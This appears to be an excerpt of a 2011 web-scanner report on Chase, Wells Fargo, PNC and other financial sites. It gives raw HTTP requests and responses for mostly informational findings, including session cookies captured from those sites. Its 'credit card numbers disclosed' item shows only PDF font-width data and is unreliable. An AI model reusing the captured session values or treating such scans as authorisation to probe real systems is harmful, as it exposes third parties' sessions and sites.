</Subtype/Type1/FontDescriptor 181 0 R/LastChar 213/Widths[271 0 0 0 0 0 0 208 313 313 0 667 167 354 167 0 583 583 583 583 583 0 0 0 0 0 0 0 0 0 0 0 896 646 667 667 688 604 562 0 729 229 0 0 562 792 708 708 625 708 646 604 542 688 0 875 0 0 0 0 0 0 0 0 0 500 521 479 521 521 313 542 521 208 208 500 208 771 521 521 521 0 313 458 292 52
...[SNIP]...
</Subtype/Type1/FontDescriptor 181 0 R/LastChar 122/Widths[271 0 0 0 0 0 0 0 0 0 0 0 167 354 167 0 583 0 0 0 583 0 0 0 0 0 208 208 0 0 0 0 0 646 0 667 688 0 0 0 0 229 0 0 562 792 708 0 625 0 0 604 542 688 0 0 667 0 0 0 0 0 0 0 0 500 521 479 521 521 313 542 521 208 0 500 208 771 521 521 521 500 313 458 292 521 41
...[SNIP]...
0 0 0 0 0 250 389 250 389 0 500 0 500 500 0 500 0 0 0 250 0 0 0 0 0 0 722 0 667 0 0 500 722 0 0 0 0 0 0 0 0 556 0 667 556 0 0 0 0 0 0 0 0 0 0 0 0 0 444 500 389 500 444 333 500 556 278 0 0 278 832 556 500 500 0 389 389 333 556 500 722 0 0 0 0 0 0 0 250 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 250 0 0 250 0 250 250 0 0 250 250 250 250 250 0 0 250 0 0 0 0 0 250 0 250 250 0
...[SNIP]...
</Subtype/Type1/FontDescriptor 181 0 R/LastChar 213/Widths[271 0 0 0 0 875 646 0 313 313 0 0 167 354 167 0 583 583 583 583 0 0 583 0 0 583 208 0 0 0 0 479 0 646 667 667 688 0 562 0 729 229 500 0 562 792 708 708 625 0 0 604 542 688 604 875 667 625 0 0 0 0 0 0 0 500 521 479 521 521 313 542 521 208 0 500 208 771 521 521 521 500 313 458
...[SNIP]...
08 0 0 0 0 479 0 646 667 667 688 0 562 708 729 229 0 0 0 792 708 708 625 0 646 604 542 0 604 875 0 625 583 0 0 0 0 0 0 500 521 479 521 521 313 542 521 208 0 500 208 771 521 521 521 500 313 458 292 521 417 688 458 437 396 0 0 0 0 271 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 333 0 0 0 0 0 0 0 271 0 0 271 0 271 271 0 0 271 271 271 271 271 0 0 271 0 0 0 0 0 271 0 271 271 0 0 0 271 0 0 0 0 0
...[SNIP]...
</Subtype/Type1/FontDescriptor 181 0 R/LastChar 122/Widths[271 0 0 0 0 0 0 0 0 0 0 0 167 354 167 0 583 0 0 0 583 0 0 0 0 0 208 208 0 0 0 0 0 646 0 667 688 0 0 0 0 229 0 0 562 792 708 0 625 0 0 604 542 688 0 0 667 0 0 0 0 0 0 0 0 500 521 479 521 521 313 542 521 208 0 500 208 771 521 521 521 500 313 458 292 521 41
...[SNIP]...
0 0 0 0 0 250 389 250 389 0 500 0 500 500 0 500 0 0 0 250 0 0 0 0 0 0 722 0 667 0 0 500 722 0 0 0 0 0 0 0 0 556 0 667 556 0 0 0 0 0 0 0 0 0 0 0 0 0 444 500 389 500 444 333 500 556 278 0 0 278 832 556 500 500 0 389 389 333 556 500 722 0 0 0 0 0 0 0 250 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 250 0 0 250 0 250 250 0 0 250 250 250 250 250 0 0 250 0 0 0 0 0 250 0 250 250 0
...[SNIP]...
</Subtype/Type1/FontDescriptor 181 0 R/LastChar 213/Widths[271 0 0 0 0 875 646 0 313 313 0 0 167 354 167 0 583 583 583 583 0 0 583 0 0 583 208 0 0 0 0 479 0 646 667 667 688 0 562 0 729 229 500 0 562 792 708 708 625 0 0 604 542 688 604 875 667 625 0 0 0 0 0 0 0 500 521 479 521 521 313 542 521 208 0 500 208 771 521 521 521 500 313 458
...[SNIP]...
08 0 0 0 0 479 0 646 667 667 688 0 562 708 729 229 0 0 0 792 708 708 625 0 646 604 542 0 604 875 0 625 583 0 0 0 0 0 0 500 521 479 521 521 313 542 521 208 0 500 208 771 521 521 521 500 313 458 292 521 417 688 458 437 396 0 0 0 0 271 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 333 0 0 0 0 0 0 0 271 0 0 271 0 271 271 0 0 271 271 271 271 271 0 0 271 0 0 0 0 0 271 0 271 271 0 0 0 271 0 0 0 0 0
...[SNIP]...

22.3. http://www.arbornetworks.com/dmdocuments/WorldwideInfrastructureSecurityReport_US_sept06.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /dmdocuments/WorldwideInfrastructureSecurityReport_US_sept06.pdf

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /dmdocuments/WorldwideInfrastructureSecurityReport_US_sept06.pdf HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:54:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
Last-Modified: Fri, 31 Oct 2008 18:29:49 GMT
ETag: "a4744-3342d-45a90c84b2140"
Accept-Ranges: bytes
Content-Length: 209965
Connection: close
Content-Type: application/pdf

%PDF-1.3%....
142 0 obj <</Linearized 1/L 172688/O 145/E 65025/N 18/T 169800/H [ 1376 956]>>endobj
xref
142 54
0000000016 00000 n
0000002332 00000 n
0000002414 00000 n
0000002542
...[SNIP]...
</Subtype/Type1/FontDescriptor 193 0 R/LastChar 89/Widths[250 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 396 0 396 0 0 0 396 0 0 0 0 0 0 0 0 0 0 437 479 458 479 417 396 0 0 229 0 0 375 688 500 479 458 0 479 458 396 479 0 708 0 417]/Name/F2/BaseFont/QEKKHA+AkzidenzGroteskBE-BoldCn/FirstChar 32/Encoding 194 0 R/Type/Font>
...[SNIP]...
0 0 1000 0 0 0 0 0 0 0 0 0 333 556 556 556 556 556 0 0 0 0 0 0 0 0 0 0 0 0 648 0 778 0 0 0 0 0 0 0 0 0 832 704 814 630 0 0 667 0 0 0 0 0 0 0 0 0 0 0 0 0 500 0 519 0 519 0 0 519 204 0 0 204 778 519 536 556 0 333 481 278 519]/Name/F20/BaseFont/ZFTHDE+AkzidenzGrotesk-Roman/FirstChar 32/Encoding 45 0 R/Type/Font>
...[SNIP]...
</Subtype/Type1/FontDescriptor 111 0 R/LastChar 121/Widths[278 0 0 0 0 1000 0 0 0 0 0 0 0 0 0 0 556 556 556 556 556 556 556 0 0 0 0 0 0 0 0 0 0 648 0 778 0 611 0 0 0 0 0 0 0 0 704 814 630 0 667 667 0 0 0 0 0 628 0 0 0 0 0 0 0 0 0 0 556 519 0 556 519 204 0 0 0 778 519 536 556 0 333 481 278 519 444 0 0 444]/Name/F23/BaseFont/ZFTHDE+AkzidenzGrotesk-Roman/FirstChar 32/Encoding 65 0 R/Type/Font>
...[SNIP]...
0 296 0 333 556 556 556 556 556 556 556 556 0 0 0 0 600 0 0 0 0 648 0 778 0 611 0 0 722 0 0 0 0 0 704 814 0 0 667 667 556 0 0 0 0 0 0 0 0 0 0 0 0 500 556 519 556 519 0 556 519 204 0 481 0 778 519 536 556 0 333 481 278 519 444 0 0 444 426]/Name/F10/BaseFont/ZFTHDE+AkzidenzGrotesk-Roman/FirstChar 32/Encoding 106 0 R/Type/Font>
...[SNIP]...

23. Cacheable HTTPS response  previous  next
There are 177 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


23.1. https://app.icontact.com/icp/signup.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://app.icontact.com
Path:   /icp/signup.php

Request

GET /icp/signup.php HTTP/1.1
Host: app.icontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:06 GMT
Server: Apache/2.2.9 (Debian)
Content-Length: 177
Connection: close
Content-Type: text/html; charset=utf-8


       <html>
       <head><title>iContact: Join Mailing List</title></head>
       <body><p>An error occured during your email list submission. Please try again later.</p></body>
       </html>

23.2. https://arbor.custhelp.com/ci/browserSearch/desc/https:/arbor.custhelp.com/app/answers/list/kw/{searchTerms}/Support%20Home%20Page%20Search/Support%20Home%20Page%20Search/images/icons/Search16.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /ci/browserSearch/desc/https:/arbor.custhelp.com/app/answers/list/kw/{searchTerms}/Support%20Home%20Page%20Search/Support%20Home%20Page%20Search/images/icons/Search16.png

Request

GET /ci/browserSearch/desc/https:/arbor.custhelp.com/app/answers/list/kw/{searchTerms}/Support%20Home%20Page%20Search/Support%20Home%20Page%20Search/images/icons/Search16.png HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:05:14 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Expires: Sat, 05 Mar 2011 00:05:14 GMT
Content-Length: 708
RNT-Time: D=102042 t=1296691514864068
RNT-Machine: 04
Content-Type: application/opensearchdescription+xml; charset="utf-8"
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
<ShortNa
...[SNIP]...

23.3. https://careers.jpmorganchase.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://careers.jpmorganchase.com
Path:   /

Request

GET / HTTP/1.1
Host: careers.jpmorganchase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:01:51 GMT
Server: Apache
Last-Modified: Tue, 21 Aug 2007 00:43:14 GMT
ETag: "30d02-b1-f13e0c80"
Accept-Ranges: bytes
Content-Length: 177
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" Content="0; URL=http://careers.jpmorganchase.com/career/careerhome">
</HEAD>

</HTML>

23.4. https://content.pncmc.com/live/pnc/careers/main/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://content.pncmc.com
Path:   /live/pnc/careers/main/index.html

Request

GET /live/pnc/careers/main/index.html HTTP/1.1
Host: content.pncmc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "cf828318f1d25e824951944dc53b7108:1267212983"
Last-Modified: Fri, 26 Feb 2010 19:36:23 GMT
Content-Type: text/html
Date: Wed, 02 Feb 2011 22:09:55 GMT
Content-Length: 2968
Connection: close

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>PNC Careers</title>
<script language="j
...[SNIP]...

23.5. https://content.pncmc.com/live/pnc/personal/OLBDemo/sgtour.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://content.pncmc.com
Path:   /live/pnc/personal/OLBDemo/sgtour.html

Request

GET /live/pnc/personal/OLBDemo/sgtour.html HTTP/1.1
Host: content.pncmc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "e8bcf8f0c7fbca07e89ed36182438cb5:1252950688"
Last-Modified: Mon, 14 Sep 2009 17:51:28 GMT
Content-Type: text/html
Date: Wed, 02 Feb 2011 22:09:55 GMT
Content-Length: 2815
Connection: close

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>PNC Online Banking - Self Guided Tour</t
...[SNIP]...

23.6. https://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=1359940;type=front061;cat=2010b535;ord=1;num=? HTTP/1.1
Host: fls.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Wed, 02 Feb 2011 22:11:31 GMT
Expires: Wed, 02 Feb 2011 22:11:31 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

23.7. https://mfasa.chase.com/auth/fcc/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mfasa.chase.com
Path:   /auth/fcc/login

Request

GET /auth/fcc/login HTTP/1.1
Host: mfasa.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:34 GMT
Server: IBM_HTTP_Server
Content-Length: 0
Keep-Alive: timeout=3, max=86
Connection: Keep-Alive
Content-Type: text/plain
Content-Language: en


23.8. https://online.wellsfargo.com/common/html/wibdisc.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /common/html/wibdisc.html

Request

GET /common/html/wibdisc.html HTTP/1.1
Host: online.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:02:13 GMT
Content-length: 151726
Content-type: text/html
Last-modified: Tue, 22 Jun 2010 00:49:05 GMT
Etag: "250ae-4c200881"
Accept-ranges: bytes
Connection: close

<html>
<head>
<a NAME="top"></a>
<title>Online Access Agreement</title>


<LINK REL="stylesheet" TYPE="text/css" HREF="../styles/wib-wf.css">
<LINK REL="stylesheet" TYPE="text/css" HREF="../styles/NS6
...[SNIP]...

23.9. https://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://picasaweb.google.com
Path:   /lh/view

Request

GET /lh/view?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Thu, 03 Feb 2011 01:04:38 GMT
Date: Thu, 03 Feb 2011 01:04:38 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=2aBCuxRjaNZC; Path=/; Secure; HttpOnly
Set-Cookie: S=photos_html=GtgaoWVmRAXTeT2zIwDvTA; Domain=.google.com; Path=/; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...

23.10. https://secure.ed4.net/charteronebank/genenroll/signup.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.ed4.net
Path:   /charteronebank/genenroll/signup.cfm

Request

GET /charteronebank/genenroll/signup.cfm HTTP/1.1
Host: secure.ed4.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 22:02:24 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Error - There's a problem with the link</title>
<style>
body, p, td, th    { font-family: Arial, Helvetica, Sans-S
...[SNIP]...

23.11. https://secure.ed4.net/citizensbank/genenroll/signup.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.ed4.net
Path:   /citizensbank/genenroll/signup.cfm

Request

GET /citizensbank/genenroll/signup.cfm HTTP/1.1
Host: secure.ed4.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 22:02:25 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Error - There's a problem with the link</title>
<style>
body, p, td, th    { font-family: Arial, Helvetica, Sans-S
...[SNIP]...

23.12. https://secure.img-cdn.mediaplex.com/0/13770/universal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.img-cdn.mediaplex.com
Path:   /0/13770/universal.html

Request

GET /0/13770/universal.html HTTP/1.1
Host: secure.img-cdn.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 28 Jan 2011 18:54:06 GMT
ETag: "59ab54-36bc-49aec972b4f80"
Content-Type: text/html; charset=ISO-8859-1
Date: Wed, 02 Feb 2011 22:02:27 GMT
Content-Length: 14012
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript">
<!--

var page_name = "";
var protocol = window.location.protoc
...[SNIP]...

23.13. https://secure.opinionlab.com/ccc01/comment_card.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDCQATDDAR=FGIHILFAKFPCACOOHKFEFHBP; path=/
Date: Wed, 02 Feb 2011 22:02:31 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

23.14. https://secure.opinionlab.com/pageviewer/pv_controlboard.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /pageviewer/pv_controlboard.html

Request

GET /pageviewer/pv_controlboard.html HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 100
Content-Type: text/html
Last-Modified: Fri, 12 Jan 2007 19:33:13 GMT
Accept-Ranges: bytes
ETag: "4d9042808036c71:206b"
Date: Wed, 02 Feb 2011 22:02:29 GMT
Connection: close

<% Response.Redirect "https://pageviewer.opinionlab.com/pv_controlboard.html?url="&Request("url") %>

23.15. https://secure.opinionlab.com/rate36s.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /rate36s.asp

Request

GET /rate36s.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:02:16 GMT
Connection: close

invalid call method

23.16. https://www.1sttools.com/loginout/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.1sttools.com
Path:   /loginout/login.asp

Request

GET /loginout/login.asp HTTP/1.1
Host: www.1sttools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 21:54:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11382
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCARABDDQ=FABHMNIADKMFMMNBNHMMMOCM; path=/
Cache-control: private


<html>
<head>
   <title>LendingTools.com</title>
</head>


   <body onLoad="hndOnLoad();document.forms[0].username.focus();" bgcolor="#FFFFFF" leftmargin="0" topmargin="0" rightmargin="0">



...[SNIP]...

23.17. https://www.chase.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /

Request

GET / HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:00:30 GMT
Content-length: 22894
Content-type: text/html
Set-Cookie: v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Wed, 02 Feb 2011 15:05:03 GMT
Etag: "596e-4d49729f"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

23.18. https://www.chase.com/Chase.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /Chase.html

Request

GET /Chase.html HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:37 GMT
Content-length: 22765
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Wed, 02 Feb 2011 15:05:07 GMT
Etag: "58ed-4d4972a3"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

23.19. https://www.chase.com/auto-loan/car-loan.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /auto-loan/car-loan.htm

Request

GET /auto-loan/car-loan.htm HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:35 GMT
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

23.20. https://www.chase.com/ccp/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /ccp/index.jsp

Request

GET /ccp/index.jsp?pg_name=ccpmapp/privacy_security/protection/page/privacy_policy HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:36 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Set-Cookie: DCTMSESSION=2KtTNJXGn1hvy7XNCKpDSKY1kT9lz0pynbNTtvbLypvtlw4Jrdqy!2074473016; path=/
Connection: close


<html LANG="EN" >


<head>


<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/content.css'/>
<script language='Javas
...[SNIP]...

23.21. https://www.chase.com/ccpmweb/shared/document/webtrends.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /ccpmweb/shared/document/webtrends.html

Request

GET /ccpmweb/shared/document/webtrends.html?currentURL=https%3A//www.chase.com%3A443/index.jsp%3Fpg_name%3Dccpmapp/shared/assets/page/wamuwelcome3&page_name=ccpmapp/shared/assets/page/wamuwelcome3 HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/wamuwelcome3/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:00:53 GMT
Content-length: 0
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Thu, 05 Aug 2010 11:14:24 GMT
Etag: "0-4c5a9d10"
Accept-ranges: bytes


23.22. https://www.chase.com/chf/mortgage/om_chasecom_redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /chf/mortgage/om_chasecom_redirect

Request

GET /chf/mortgage/om_chasecom_redirect HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:35 GMT
Content-length: 959
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
